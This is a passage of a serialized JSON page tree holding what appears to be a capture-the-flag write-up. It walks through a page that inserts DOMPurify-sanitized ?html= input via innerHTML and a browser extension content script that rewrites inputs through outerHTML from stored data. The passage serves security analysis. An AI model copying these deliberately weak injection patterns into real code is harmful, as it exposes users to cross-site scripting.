s":15033,"children":15034},{"style":140},[15035],{"type":38,"value":15036},"output",{"type":33,"tag":128,"props":15038,"children":15039},{"style":676},[15040],{"type":38,"value":669},{"type":33,"tag":128,"props":15042,"children":15043},{"style":312},[15044],{"type":38,"value":6136},{"type":33,"tag":128,"props":15046,"children":15047},{"style":1576},[15048],{"type":38,"value":5982},{"type":33,"tag":128,"props":15050,"children":15051},{"style":312},[15052],{"type":38,"value":6097},{"type":33,"tag":128,"props":15054,"children":15055},{"class":130,"line":1089},[15056,15060,15065,15070,15074,15078,15083,15087,15091,15095],{"type":33,"tag":128,"props":15057,"children":15058},{"style":312},[15059],{"type":38,"value":6105},{"type":33,"tag":128,"props":15061,"children":15062},{"style":1576},[15063],{"type":38,"value":15064},"script",{"type":33,"tag":128,"props":15066,"children":15067},{"style":306},[15068],{"type":38,
"value":15069}," src",{"type":33,"tag":128,"props":15071,"children":15072},{"style":312},[15073],{"type":38,"value":315},{"type":33,"tag":128,"props":15075,"children":15076},{"style":676},[15077],{"type":38,"value":669},{"type":33,"tag":128,"props":15079,"children":15080},{"style":140},[15081],{"type":38,"value":15082},"https://unpkg.com/dompurify@latest/dist/purify.min.js",{"type":33,"tag":128,"props":15084,"children":15085},{"style":676},[15086],{"type":38,"value":669},{"type":33,"tag":128,"props":15088,"children":15089},{"style":312},[15090],{"type":38,"value":6136},{"type":33,"tag":128,"props":15092,"children":15093},{"style":1576},[15094],{"type":38,"value":15064},{"type":33,"tag":128,"props":15096,"children":15097},{"style":312},[15098],{"type":38,"value":6097},{"type":33,"tag":128,"props":15100,"children":15101},{"class":130,"line":1101},[15102,15106,15110],{"type":33,"tag":128,"props":15103,"children":15104},{"style":312},[15105],{"type":38,"value":6105},{"type":33,"tag":128,"props":15107,"children":15108},{"style":1576},[15109],{"type":38,"value":15064},{"type":33,"tag":128,"props":15111,"children":15112},{"style":312},[15113],{"type":38,"value":6097},{"type":33,"tag":128,"props":15115,"children":15116},{"class":130,"line":1114},[15117,15122,15127,15131,15135,15139,15143,15147,15151,15156],{"type":33,"tag":128,"props":15118,"children":15119},{"style":300},[15120],{"type":38,"value":15121},"        const",{"type":33,"tag":128,"props":15123,"children":15124},{"style":306},[15125],{"type":38,"value":15126}," 
url",{"type":33,"tag":128,"props":15128,"children":15129},{"style":312},[15130],{"type":38,"value":5657},{"type":33,"tag":128,"props":15132,"children":15133},{"style":300},[15134],{"type":38,"value":13061},{"type":33,"tag":128,"props":15136,"children":15137},{"style":135},[15138],{"type":38,"value":13899},{"type":33,"tag":128,"props":15140,"children":15141},{"style":312},[15142],{"type":38,"value":5566},{"type":33,"tag":128,"props":15144,"children":15145},{"style":306},[15146],{"type":38,"value":8275},{"type":33,"tag":128,"props":15148,"children":15149},{"style":312},[15150],{"type":38,"value":215},{"type":33,"tag":128,"props":15152,"children":15153},{"style":306},[15154],{"type":38,"value":15155},"href",{"type":33,"tag":128,"props":15157,"children":15158},{"style":312},[15159],{"type":38,"value":5815},{"type":33,"tag":128,"props":15161,"children":15162},{"class":130,"line":1127},[15163,15167,15171,15175,15179,15183,15188,15192,15196,15200,15204,15208,15212],{"type":33,"tag":128,"props":15164,"children":15165},{"style":300},[15166],{"type":38,"value":15121},{"type":33,"tag":128,"props":15168,"children":15169},{"style":306},[15170],{"type":38,"value":14570},{"type":33,"tag":128,"props":15172,"children":15173},{"style":312},[15174],{"type":38,"value":5657},{"type":33,"tag":128,"props":15176,"children":15177},{"style":306},[15178],{"type":38,"value":15126},{"type":33,"tag":128,"props":15180,"children":15181},{"style":312},[15182],{"type":38,"value":215},{"type":33,"tag":128,"props":15184,"children":15185},{"style":306},[15186],{"type":38,"value":15187},"searchParams",{"type":33,"tag":128,"props":15189,"children":15190},{"style":312},[15191],{"type":38,"value":215},{"type":33,"tag":128,"props":15193,"children":15194},{"style":135},[15195],{"type":38,"value":13526},{"type":33,"tag":128,"props":15197,"children":15198},{"style":312},[15199],{"type":38,"value":5566},{"type":33,"tag":128,"props":15201,"children":15202},{"style":676},[15203],{"type":38,"value":6040},{"type":3
3,"tag":128,"props":15205,"children":15206},{"style":140},[15207],{"type":38,"value":5929},{"type":33,"tag":128,"props":15209,"children":15210},{"style":676},[15211],{"type":38,"value":6040},{"type":33,"tag":128,"props":15213,"children":15214},{"style":312},[15215],{"type":38,"value":5815},{"type":33,"tag":128,"props":15217,"children":15218},{"class":130,"line":1139},[15219,15224,15228,15232,15236],{"type":33,"tag":128,"props":15220,"children":15221},{"style":1576},[15222],{"type":38,"value":15223},"        if",{"type":33,"tag":128,"props":15225,"children":15226},{"style":312},[15227],{"type":38,"value":2852},{"type":33,"tag":128,"props":15229,"children":15230},{"style":306},[15231],{"type":38,"value":5929},{"type":33,"tag":128,"props":15233,"children":15234},{"style":312},[15235],{"type":38,"value":2966},{"type":33,"tag":128,"props":15237,"children":15238},{"style":312},[15239],{"type":38,"value":762},{"type":33,"tag":128,"props":15241,"children":15242},{"class":130,"line":1152},[15243,15248,15252,15256,15260,15264,15269,15273,15277,15281,15285,15290,15294,15299,15303,15307],{"type":33,"tag":128,"props":15244,"children":15245},{"style":306},[15246],{"type":38,"value":15247},"            
document",{"type":33,"tag":128,"props":15249,"children":15250},{"style":312},[15251],{"type":38,"value":215},{"type":33,"tag":128,"props":15253,"children":15254},{"style":135},[15255],{"type":38,"value":7764},{"type":33,"tag":128,"props":15257,"children":15258},{"style":312},[15259],{"type":38,"value":5566},{"type":33,"tag":128,"props":15261,"children":15262},{"style":676},[15263],{"type":38,"value":6040},{"type":33,"tag":128,"props":15265,"children":15266},{"style":140},[15267],{"type":38,"value":15268},".output",{"type":33,"tag":128,"props":15270,"children":15271},{"style":676},[15272],{"type":38,"value":6040},{"type":33,"tag":128,"props":15274,"children":15275},{"style":312},[15276],{"type":38,"value":6700},{"type":33,"tag":128,"props":15278,"children":15279},{"style":306},[15280],{"type":38,"value":8391},{"type":33,"tag":128,"props":15282,"children":15283},{"style":312},[15284],{"type":38,"value":5657},{"type":33,"tag":128,"props":15286,"children":15287},{"style":306},[15288],{"type":38,"value":15289}," DOMPurify",{"type":33,"tag":128,"props":15291,"children":15292},{"style":312},[15293],{"type":38,"value":215},{"type":33,"tag":128,"props":15295,"children":15296},{"style":135},[15297],{"type":38,"value":15298},"sanitize",{"type":33,"tag":128,"props":15300,"children":15301},{"style":312},[15302],{"type":38,"value":5566},{"type":33,"tag":128,"props":15304,"children":15305},{"style":306},[15306],{"type":38,"value":5929},{"type":33,"tag":128,"props":15308,"children":15309},{"style":312},[15310],{"type":38,"value":5815},{"type":33,"tag":128,"props":15312,"children":15313},{"class":130,"line":1165},[15314],{"type":33,"tag":128,"props":15315,"children":15316},{"style":312},[15317],{"type":38,"value":15318},"        
}\n",{"type":33,"tag":128,"props":15320,"children":15321},{"class":130,"line":1177},[15322,15326,15330],{"type":33,"tag":128,"props":15323,"children":15324},{"style":312},[15325],{"type":38,"value":14993},{"type":33,"tag":128,"props":15327,"children":15328},{"style":1576},[15329],{"type":38,"value":15064},{"type":33,"tag":128,"props":15331,"children":15332},{"style":312},[15333],{"type":38,"value":6097},{"type":33,"tag":128,"props":15335,"children":15336},{"class":130,"line":1189},[15337,15341,15345],{"type":33,"tag":128,"props":15338,"children":15339},{"style":312},[15340],{"type":38,"value":6190},{"type":33,"tag":128,"props":15342,"children":15343},{"style":1576},[15344],{"type":38,"value":5671},{"type":33,"tag":128,"props":15346,"children":15347},{"style":312},[15348],{"type":38,"value":6097},{"type":33,"tag":128,"props":15350,"children":15351},{"class":130,"line":1202},[15352],{"type":33,"tag":128,"props":15353,"children":15354},{"emptyLinePlaceholder":896},[15355],{"type":38,"value":899},{"type":33,"tag":128,"props":15357,"children":15358},{"class":130,"line":1214},[15359,15363,15367],{"type":33,"tag":128,"props":15360,"children":15361},{"style":312},[15362],{"type":38,"value":6190},{"type":33,"tag":128,"props":15364,"children":15365},{"style":1576},[15366],{"type":38,"value":5929},{"type":33,"tag":128,"props":15368,"children":15369},{"style":312},[15370],{"type":38,"value":6097},{"type":33,"tag":47,"props":15372,"children":15373},{},[15374],{"type":38,"value":15375},"In detail, we can see in the code that the page takes the query parameter ?html= to update the div below the form. 
 The value is sanitized with the latest version of DOMPurify and inserted into the div via innerHTML.",{"type":33,"tag":81,"props":15377,"children":15379},{"id":15378},"web-extension",[15380],{"type":38,"value":15381},"Web extension:",{"type":33,"tag":88,"props":15383,"children":15385},{"id":15384},"contentscript",[15386],{"type":38,"value":15387},"ContentScript:",{"type":33,"tag":47,"props":15389,"children":15390},{},[15391,15393,15399,15400,15406],{"type":38,"value":15392},"The first part of the contentScript contains two main functions, ",{"type":33,"tag":105,"props":15394,"children":15396},{"className":15395},[],[15397],{"type":38,"value":15398},"loads()",{"type":38,"value":6345},{"type":33,"tag":105,"props":15401,"children":15403},{"className":15402},[],[15404],{"type":38,"value":15405},"saves()",{"type":38,"value":284},{"type":33,"tag":114,"props":15408,"children":15409},{"lang":5526},[15410],{"type":33,"tag":119,"props":15411,"children":15413},{"className":5530,"code":15412,"language":5526,"meta":8,"style":8},"async function main() {\n  console.log('Content script is running');\n  await loads();\n  await saves();\n}\n\nmain();\n",[15414],{"type":33,"tag":105,"props":15415,"children":15416},{"__ignoreMap":8},[15417,15442,15479,15497,15513,15520,15527],{"type":33,"tag":128,"props":15418,"children":15419},{"class":130,"line":131},[15420,15424,15429,15434,15438],{"type":33,"tag":128,"props":15421,"children":15422},{"style":300},[15423],{"type":38,"value":13862},{"type":33,"tag":128,"props":15425,"children":15426},{"style":300},[15427],{"type":38,"value":15428}," function",{"type":33,"tag":128,"props":15430,"children":15431},{"style":135},[15432],{"type":38,"value":15433}," 
main",{"type":33,"tag":128,"props":15435,"children":15436},{"style":312},[15437],{"type":38,"value":9376},{"type":33,"tag":128,"props":15439,"children":15440},{"style":312},[15441],{"type":38,"value":762},{"type":33,"tag":128,"props":15443,"children":15444},{"class":130,"line":362},[15445,15450,15454,15458,15462,15466,15471,15475],{"type":33,"tag":128,"props":15446,"children":15447},{"style":306},[15448],{"type":38,"value":15449},"  console",{"type":33,"tag":128,"props":15451,"children":15452},{"style":312},[15453],{"type":38,"value":215},{"type":33,"tag":128,"props":15455,"children":15456},{"style":135},[15457],{"type":38,"value":13157},{"type":33,"tag":128,"props":15459,"children":15460},{"style":312},[15461],{"type":38,"value":5566},{"type":33,"tag":128,"props":15463,"children":15464},{"style":676},[15465],{"type":38,"value":6040},{"type":33,"tag":128,"props":15467,"children":15468},{"style":140},[15469],{"type":38,"value":15470},"Content script is running",{"type":33,"tag":128,"props":15472,"children":15473},{"style":676},[15474],{"type":38,"value":6040},{"type":33,"tag":128,"props":15476,"children":15477},{"style":312},[15478],{"type":38,"value":5815},{"type":33,"tag":128,"props":15480,"children":15481},{"class":130,"line":403},[15482,15487,15492],{"type":33,"tag":128,"props":15483,"children":15484},{"style":1576},[15485],{"type":38,"value":15486},"  await",{"type":33,"tag":128,"props":15488,"children":15489},{"style":135},[15490],{"type":38,"value":15491}," loads",{"type":33,"tag":128,"props":15493,"children":15494},{"style":312},[15495],{"type":38,"value":15496},"();\n",{"type":33,"tag":128,"props":15498,"children":15499},{"class":130,"line":739},[15500,15504,15509],{"type":33,"tag":128,"props":15501,"children":15502},{"style":1576},[15503],{"type":38,"value":15486},{"type":33,"tag":128,"props":15505,"children":15506},{"style":135},[15507],{"type":38,"value":15508}," 
saves",{"type":33,"tag":128,"props":15510,"children":15511},{"style":312},[15512],{"type":38,"value":15496},{"type":33,"tag":128,"props":15514,"children":15515},{"class":130,"line":765},[15516],{"type":33,"tag":128,"props":15517,"children":15518},{"style":312},[15519],{"type":38,"value":854},{"type":33,"tag":128,"props":15521,"children":15522},{"class":130,"line":804},[15523],{"type":33,"tag":128,"props":15524,"children":15525},{"emptyLinePlaceholder":896},[15526],{"type":38,"value":899},{"type":33,"tag":128,"props":15528,"children":15529},{"class":130,"line":839},[15530,15535],{"type":33,"tag":128,"props":15531,"children":15532},{"style":135},[15533],{"type":38,"value":15534},"main",{"type":33,"tag":128,"props":15536,"children":15537},{"style":312},[15538],{"type":38,"value":15496},{"type":33,"tag":47,"props":15540,"children":15541},{},[15542,15543,15548,15550,15556,15558,15564],{"type":38,"value":2766},{"type":33,"tag":105,"props":15544,"children":15546},{"className":15545},[],[15547],{"type":38,"value":15398},{"type":38,"value":15549}," function loads the elements stored in chrome storage, using the key defined at save time. 
When loading, each input is recreated via the ",{"type":33,"tag":105,"props":15551,"children":15553},{"className":15552},[],[15554],{"type":38,"value":15555},"input()",{"type":38,"value":15557}," function, and the DOM is updated by assigning the result to ",{"type":33,"tag":105,"props":15559,"children":15561},{"className":15560},[],[15562],{"type":38,"value":15563},"p.outerHTML",{"type":38,"value":215},{"type":33,"tag":114,"props":15566,"children":15567},{"lang":5526},[15568],{"type":33,"tag":119,"props":15569,"children":15571},{"className":5530,"code":15570,"language":5526,"meta":8,"style":8},"function load(key) {\n  return new Promise((resolve, reject) => {\n    chrome.runtime.sendMessage(\n      {\n        type: 'LOAD',\n        payload: { key },\n      },\n      response => {\n        if (response.error) {\n          return reject(response.error);\n        }\n        resolve(response);\n      }\n    );\n  })\n}\n\nasync function loads() {\n  var inputs = document.querySelectorAll('input');\n  for (const p of inputs) {\n    const key = p.name;\n    try {\n      var data = await load(key);\n      if (data) {\n        console.log(input(key, data, p.outerHTML))\n        p.outerHTML = input(key, data, p.outerHTML);\n      }\n    } catch (error) {\n      console.log('Error loading data', error);\n      continue;\n    }\n  
}\n}\n",[15572],{"type":33,"tag":105,"props":15573,"children":15574},{"__ignoreMap":8},[15575,15602,15645,15674,15682,15710,15735,15743,15759,15790,15822,15829,15849,15856,15864,15871,15878,15885,15908,15957,15996,16027,16039,16075,16098,16159,16220,16227,16254,16298,16310,16317,16324],{"type":33,"tag":128,"props":15576,"children":15577},{"class":130,"line":131},[15578,15582,15586,15590,15594,15598],{"type":33,"tag":128,"props":15579,"children":15580},{"style":300},[15581],{"type":38,"value":13008},{"type":33,"tag":128,"props":15583,"children":15584},{"style":135},[15585],{"type":38,"value":13340},{"type":33,"tag":128,"props":15587,"children":15588},{"style":312},[15589],{"type":38,"value":5566},{"type":33,"tag":128,"props":15591,"children":15592},{"style":306},[15593],{"type":38,"value":13022},{"type":33,"tag":128,"props":15595,"children":15596},{"style":312},[15597],{"type":38,"value":2966},{"type":33,"tag":128,"props":15599,"children":15600},{"style":312},[15601],{"type":38,"value":762},{"type":33,"tag":128,"props":15603,"children":15604},{"class":130,"line":362},[15605,15609,15613,15617,15621,15625,15629,15633,15637,15641],{"type":33,"tag":128,"props":15606,"children":15607},{"style":1576},[15608],{"type":38,"value":13056},{"type":33,"tag":128,"props":15610,"children":15611},{"style":300},[15612],{"type":38,"value":13061},{"type":33,"tag":128,"props":15614,"children":15615},{"style":437},[15616],{"type":38,"value":13066},{"type":33,"tag":128,"props":15618,"children":15619},{"style":312},[15620],{"type":38,"value":13071},{"type":33,"tag":128,"props":15622,"children":15623},{"style":306},[15624],{"type":38,"value":13076},{"type":33,"tag":128,"props":15626,"children":15627},{"style":312},[15628],{"type":38,"value":5584},{"type":33,"tag":128,"props":15630,"children":15631},{"style":306},[15632],{"type":38,"value":13085},{"type":33,"tag":128,"props":15634,"children":15635},{"style":312},[15636],{"type":38,"value":2966},{"type":33,"tag":128,"props":15638,"children":15
639},{"style":312},[15640],{"type":38,"value":5625},{"type":33,"tag":128,"props":15642,"children":15643},{"style":312},[15644],{"type":38,"value":762},{"type":33,"tag":128,"props":15646,"children":15647},{"class":130,"line":403},[15648,15652,15656,15660,15664,15669],{"type":33,"tag":128,"props":15649,"children":15650},{"style":306},[15651],{"type":38,"value":13202},{"type":33,"tag":128,"props":15653,"children":15654},{"style":312},[15655],{"type":38,"value":215},{"type":33,"tag":128,"props":15657,"children":15658},{"style":306},[15659],{"type":38,"value":13784},{"type":33,"tag":128,"props":15661,"children":15662},{"style":312},[15663],{"type":38,"value":215},{"type":33,"tag":128,"props":15665,"children":15666},{"style":135},[15667],{"type":38,"value":15668},"sendMessage",{"type":33,"tag":128,"props":15670,"children":15671},{"style":312},[15672],{"type":38,"value":15673},"(\n",{"type":33,"tag":128,"props":15675,"children":15676},{"class":130,"line":739},[15677],{"type":33,"tag":128,"props":15678,"children":15679},{"style":312},[15680],{"type":38,"value":15681},"      {\n",{"type":33,"tag":128,"props":15683,"children":15684},{"class":130,"line":765},[15685,15690,15694,15698,15702,15706],{"type":33,"tag":128,"props":15686,"children":15687},{"style":437},[15688],{"type":38,"value":15689},"        
type",{"type":33,"tag":128,"props":15691,"children":15692},{"style":312},[15693],{"type":38,"value":284},{"type":33,"tag":128,"props":15695,"children":15696},{"style":676},[15697],{"type":38,"value":6739},{"type":33,"tag":128,"props":15699,"children":15700},{"style":140},[15701],{"type":38,"value":14303},{"type":33,"tag":128,"props":15703,"children":15704},{"style":676},[15705],{"type":38,"value":6040},{"type":33,"tag":128,"props":15707,"children":15708},{"style":312},[15709],{"type":38,"value":693},{"type":33,"tag":128,"props":15711,"children":15712},{"class":130,"line":804},[15713,15718,15722,15726,15730],{"type":33,"tag":128,"props":15714,"children":15715},{"style":437},[15716],{"type":38,"value":15717},"        payload",{"type":33,"tag":128,"props":15719,"children":15720},{"style":312},[15721],{"type":38,"value":284},{"type":33,"tag":128,"props":15723,"children":15724},{"style":312},[15725],{"type":38,"value":5642},{"type":33,"tag":128,"props":15727,"children":15728},{"style":306},[15729],{"type":38,"value":5027},{"type":33,"tag":128,"props":15731,"children":15732},{"style":312},[15733],{"type":38,"value":15734}," },\n",{"type":33,"tag":128,"props":15736,"children":15737},{"class":130,"line":839},[15738],{"type":33,"tag":128,"props":15739,"children":15740},{"style":312},[15741],{"type":38,"value":15742},"      },\n",{"type":33,"tag":128,"props":15744,"children":15745},{"class":130,"line":848},[15746,15751,15755],{"type":33,"tag":128,"props":15747,"children":15748},{"style":306},[15749],{"type":38,"value":15750},"      
response",{"type":33,"tag":128,"props":15752,"children":15753},{"style":312},[15754],{"type":38,"value":5625},{"type":33,"tag":128,"props":15756,"children":15757},{"style":312},[15758],{"type":38,"value":762},{"type":33,"tag":128,"props":15760,"children":15761},{"class":130,"line":976},[15762,15766,15770,15774,15778,15782,15786],{"type":33,"tag":128,"props":15763,"children":15764},{"style":1576},[15765],{"type":38,"value":15223},{"type":33,"tag":128,"props":15767,"children":15768},{"style":312},[15769],{"type":38,"value":2852},{"type":33,"tag":128,"props":15771,"children":15772},{"style":306},[15773],{"type":38,"value":14194},{"type":33,"tag":128,"props":15775,"children":15776},{"style":312},[15777],{"type":38,"value":215},{"type":33,"tag":128,"props":15779,"children":15780},{"style":306},[15781],{"type":38,"value":6889},{"type":33,"tag":128,"props":15783,"children":15784},{"style":312},[15785],{"type":38,"value":2966},{"type":33,"tag":128,"props":15787,"children":15788},{"style":312},[15789],{"type":38,"value":762},{"type":33,"tag":128,"props":15791,"children":15792},{"class":130,"line":988},[15793,15798,15802,15806,15810,15814,15818],{"type":33,"tag":128,"props":15794,"children":15795},{"style":1576},[15796],{"type":38,"value":15797},"          
return",{"type":33,"tag":128,"props":15799,"children":15800},{"style":135},[15801],{"type":38,"value":13085},{"type":33,"tag":128,"props":15803,"children":15804},{"style":312},[15805],{"type":38,"value":5566},{"type":33,"tag":128,"props":15807,"children":15808},{"style":306},[15809],{"type":38,"value":14194},{"type":33,"tag":128,"props":15811,"children":15812},{"style":312},[15813],{"type":38,"value":215},{"type":33,"tag":128,"props":15815,"children":15816},{"style":306},[15817],{"type":38,"value":6889},{"type":33,"tag":128,"props":15819,"children":15820},{"style":312},[15821],{"type":38,"value":5815},{"type":33,"tag":128,"props":15823,"children":15824},{"class":130,"line":1001},[15825],{"type":33,"tag":128,"props":15826,"children":15827},{"style":312},[15828],{"type":38,"value":15318},{"type":33,"tag":128,"props":15830,"children":15831},{"class":130,"line":1014},[15832,15837,15841,15845],{"type":33,"tag":128,"props":15833,"children":15834},{"style":135},[15835],{"type":38,"value":15836},"        resolve",{"type":33,"tag":128,"props":15838,"children":15839},{"style":312},[15840],{"type":38,"value":5566},{"type":33,"tag":128,"props":15842,"children":15843},{"style":306},[15844],{"type":38,"value":14194},{"type":33,"tag":128,"props":15846,"children":15847},{"style":312},[15848],{"type":38,"value":5815},{"type":33,"tag":128,"props":15850,"children":15851},{"class":130,"line":1026},[15852],{"type":33,"tag":128,"props":15853,"children":15854},{"style":312},[15855],{"type":38,"value":13656},{"type":33,"tag":128,"props":15857,"children":15858},{"class":130,"line":1038},[15859],{"type":33,"tag":128,"props":15860,"children":15861},{"style":312},[15862],{"type":38,"value":15863},"    
);\n",{"type":33,"tag":128,"props":15865,"children":15866},{"class":130,"line":1051},[15867],{"type":33,"tag":128,"props":15868,"children":15869},{"style":312},[15870],{"type":38,"value":13321},{"type":33,"tag":128,"props":15872,"children":15873},{"class":130,"line":1063},[15874],{"type":33,"tag":128,"props":15875,"children":15876},{"style":312},[15877],{"type":38,"value":854},{"type":33,"tag":128,"props":15879,"children":15880},{"class":130,"line":1076},[15881],{"type":33,"tag":128,"props":15882,"children":15883},{"emptyLinePlaceholder":896},[15884],{"type":38,"value":899},{"type":33,"tag":128,"props":15886,"children":15887},{"class":130,"line":1089},[15888,15892,15896,15900,15904],{"type":33,"tag":128,"props":15889,"children":15890},{"style":300},[15891],{"type":38,"value":13862},{"type":33,"tag":128,"props":15893,"children":15894},{"style":300},[15895],{"type":38,"value":15428},{"type":33,"tag":128,"props":15897,"children":15898},{"style":135},[15899],{"type":38,"value":15491},{"type":33,"tag":128,"props":15901,"children":15902},{"style":312},[15903],{"type":38,"value":9376},{"type":33,"tag":128,"props":15905,"children":15906},{"style":312},[15907],{"type":38,"value":762},{"type":33,"tag":128,"props":15909,"children":15910},{"class":130,"line":1101},[15911,15916,15921,15925,15929,15933,15937,15941,15945,15949,15953],{"type":33,"tag":128,"props":15912,"children":15913},{"style":300},[15914],{"type":38,"value":15915},"  var",{"type":33,"tag":128,"props":15917,"children":15918},{"style":306},[15919],{"type":38,"value":15920}," 
inputs",{"type":33,"tag":128,"props":15922,"children":15923},{"style":312},[15924],{"type":38,"value":5657},{"type":33,"tag":128,"props":15926,"children":15927},{"style":306},[15928],{"type":38,"value":7562},{"type":33,"tag":128,"props":15930,"children":15931},{"style":312},[15932],{"type":38,"value":215},{"type":33,"tag":128,"props":15934,"children":15935},{"style":135},[15936],{"type":38,"value":7806},{"type":33,"tag":128,"props":15938,"children":15939},{"style":312},[15940],{"type":38,"value":5566},{"type":33,"tag":128,"props":15942,"children":15943},{"style":676},[15944],{"type":38,"value":6040},{"type":33,"tag":128,"props":15946,"children":15947},{"style":140},[15948],{"type":38,"value":14882},{"type":33,"tag":128,"props":15950,"children":15951},{"style":676},[15952],{"type":38,"value":6040},{"type":33,"tag":128,"props":15954,"children":15955},{"style":312},[15956],{"type":38,"value":5815},{"type":33,"tag":128,"props":15958,"children":15959},{"class":130,"line":1114},[15960,15965,15969,15974,15979,15984,15988,15992],{"type":33,"tag":128,"props":15961,"children":15962},{"style":1576},[15963],{"type":38,"value":15964},"  for",{"type":33,"tag":128,"props":15966,"children":15967},{"style":312},[15968],{"type":38,"value":2852},{"type":33,"tag":128,"props":15970,"children":15971},{"style":300},[15972],{"type":38,"value":15973},"const",{"type":33,"tag":128,"props":15975,"children":15976},{"style":306},[15977],{"type":38,"value":15978}," p",{"type":33,"tag":128,"props":15980,"children":15981},{"style":300},[15982],{"type":38,"value":15983}," 
of",{"type":33,"tag":128,"props":15985,"children":15986},{"style":306},[15987],{"type":38,"value":15920},{"type":33,"tag":128,"props":15989,"children":15990},{"style":312},[15991],{"type":38,"value":2966},{"type":33,"tag":128,"props":15993,"children":15994},{"style":312},[15995],{"type":38,"value":762},{"type":33,"tag":128,"props":15997,"children":15998},{"class":130,"line":1127},[15999,16003,16007,16011,16015,16019,16023],{"type":33,"tag":128,"props":16000,"children":16001},{"style":300},[16002],{"type":38,"value":5696},{"type":33,"tag":128,"props":16004,"children":16005},{"style":306},[16006],{"type":38,"value":5027},{"type":33,"tag":128,"props":16008,"children":16009},{"style":312},[16010],{"type":38,"value":5657},{"type":33,"tag":128,"props":16012,"children":16013},{"style":306},[16014],{"type":38,"value":15978},{"type":33,"tag":128,"props":16016,"children":16017},{"style":312},[16018],{"type":38,"value":215},{"type":33,"tag":128,"props":16020,"children":16021},{"style":306},[16022],{"type":38,"value":12126},{"type":33,"tag":128,"props":16024,"children":16025},{"style":312},[16026],{"type":38,"value":5676},{"type":33,"tag":128,"props":16028,"children":16029},{"class":130,"line":1139},[16030,16035],{"type":33,"tag":128,"props":16031,"children":16032},{"style":1576},[16033],{"type":38,"value":16034},"    try",{"type":33,"tag":128,"props":16036,"children":16037},{"style":312},[16038],{"type":38,"value":762},{"type":33,"tag":128,"props":16040,"children":16041},{"class":130,"line":1152},[16042,16047,16051,16055,16059,16063,16067,16071],{"type":33,"tag":128,"props":16043,"children":16044},{"style":300},[16045],{"type":38,"value":16046},"      
var",{"type":33,"tag":128,"props":16048,"children":16049},{"style":306},[16050],{"type":38,"value":13545},{"type":33,"tag":128,"props":16052,"children":16053},{"style":312},[16054],{"type":38,"value":5657},{"type":33,"tag":128,"props":16056,"children":16057},{"style":1576},[16058],{"type":38,"value":5796},{"type":33,"tag":128,"props":16060,"children":16061},{"style":135},[16062],{"type":38,"value":13340},{"type":33,"tag":128,"props":16064,"children":16065},{"style":312},[16066],{"type":38,"value":5566},{"type":33,"tag":128,"props":16068,"children":16069},{"style":306},[16070],{"type":38,"value":13022},{"type":33,"tag":128,"props":16072,"children":16073},{"style":312},[16074],{"type":38,"value":5815},{"type":33,"tag":128,"props":16076,"children":16077},{"class":130,"line":1165},[16078,16082,16086,16090,16094],{"type":33,"tag":128,"props":16079,"children":16080},{"style":1576},[16081],{"type":38,"value":13561},{"type":33,"tag":128,"props":16083,"children":16084},{"style":312},[16085],{"type":38,"value":2852},{"type":33,"tag":128,"props":16087,"children":16088},{"style":306},[16089],{"type":38,"value":2815},{"type":33,"tag":128,"props":16091,"children":16092},{"style":312},[16093],{"type":38,"value":2966},{"type":33,"tag":128,"props":16095,"children":16096},{"style":312},[16097],{"type":38,"value":762},{"type":33,"tag":128,"props":16099,"children":16100},{"class":130,"line":1177},[16101,16106,16110,16114,16118,16122,16126,16130,16134,16138,16142,16146,16150,16155],{"type":33,"tag":128,"props":16102,"children":16103},{"style":306},[16104],{"type":38,"value":16105},"        
console",{"type":33,"tag":128,"props":16107,"children":16108},{"style":312},[16109],{"type":38,"value":215},{"type":33,"tag":128,"props":16111,"children":16112},{"style":135},[16113],{"type":38,"value":13157},{"type":33,"tag":128,"props":16115,"children":16116},{"style":312},[16117],{"type":38,"value":5566},{"type":33,"tag":128,"props":16119,"children":16120},{"style":135},[16121],{"type":38,"value":14882},{"type":33,"tag":128,"props":16123,"children":16124},{"style":312},[16125],{"type":38,"value":5566},{"type":33,"tag":128,"props":16127,"children":16128},{"style":306},[16129],{"type":38,"value":13022},{"type":33,"tag":128,"props":16131,"children":16132},{"style":312},[16133],{"type":38,"value":5584},{"type":33,"tag":128,"props":16135,"children":16136},{"style":306},[16137],{"type":38,"value":13545},{"type":33,"tag":128,"props":16139,"children":16140},{"style":312},[16141],{"type":38,"value":5584},{"type":33,"tag":128,"props":16143,"children":16144},{"style":306},[16145],{"type":38,"value":15978},{"type":33,"tag":128,"props":16147,"children":16148},{"style":312},[16149],{"type":38,"value":215},{"type":33,"tag":128,"props":16151,"children":16152},{"style":306},[16153],{"type":38,"value":16154},"outerHTML",{"type":33,"tag":128,"props":16156,"children":16157},{"style":312},[16158],{"type":38,"value":2459},{"type":33,"tag":128,"props":16160,"children":16161},{"class":130,"line":1189},[16162,16167,16171,16175,16179,16184,16188,16192,16196,16200,16204,16208,16212,16216],{"type":33,"tag":128,"props":16163,"children":16164},{"style":306},[16165],{"type":38,"value":16166},"        
p",{"type":33,"tag":128,"props":16168,"children":16169},{"style":312},[16170],{"type":38,"value":215},{"type":33,"tag":128,"props":16172,"children":16173},{"style":306},[16174],{"type":38,"value":16154},{"type":33,"tag":128,"props":16176,"children":16177},{"style":312},[16178],{"type":38,"value":5657},{"type":33,"tag":128,"props":16180,"children":16181},{"style":135},[16182],{"type":38,"value":16183}," input",{"type":33,"tag":128,"props":16185,"children":16186},{"style":312},[16187],{"type":38,"value":5566},{"type":33,"tag":128,"props":16189,"children":16190},{"style":306},[16191],{"type":38,"value":13022},{"type":33,"tag":128,"props":16193,"children":16194},{"style":312},[16195],{"type":38,"value":5584},{"type":33,"tag":128,"props":16197,"children":16198},{"style":306},[16199],{"type":38,"value":13545},{"type":33,"tag":128,"props":16201,"children":16202},{"style":312},[16203],{"type":38,"value":5584},{"type":33,"tag":128,"props":16205,"children":16206},{"style":306},[16207],{"type":38,"value":15978},{"type":33,"tag":128,"props":16209,"children":16210},{"style":312},[16211],{"type":38,"value":215},{"type":33,"tag":128,"props":16213,"children":16214},{"style":306},[16215],{"type":38,"value":16154},{"type":33,"tag":128,"props":16217,"children":16218},{"style":312},[16219],{"type":38,"value":5815},{"type":33,"tag":128,"props":16221,"children":16222},{"class":130,"line":1202},[16223],{"type":33,"tag":128,"props":16224,"children":16225},{"style":312},[16226],{"type":38,"value":13656},{"type":33,"tag":128,"props":16228,"children":16229},{"class":130,"line":1214},[16230,16234,16238,16242,16246,16250],{"type":33,"tag":128,"props":16231,"children":16232},{"style":312},[16233],{"type":38,"value":14264},{"type":33,"tag":128,"props":16235,"children":16236},{"style":1576},[16237],{"type":38,"value":6855},{"type":33,"tag":128,"props":16239,"children":16240},{"style":312},[16241],{"type":38,"value":2852},{"type":33,"tag":128,"props":16243,"children":16244},{"style":306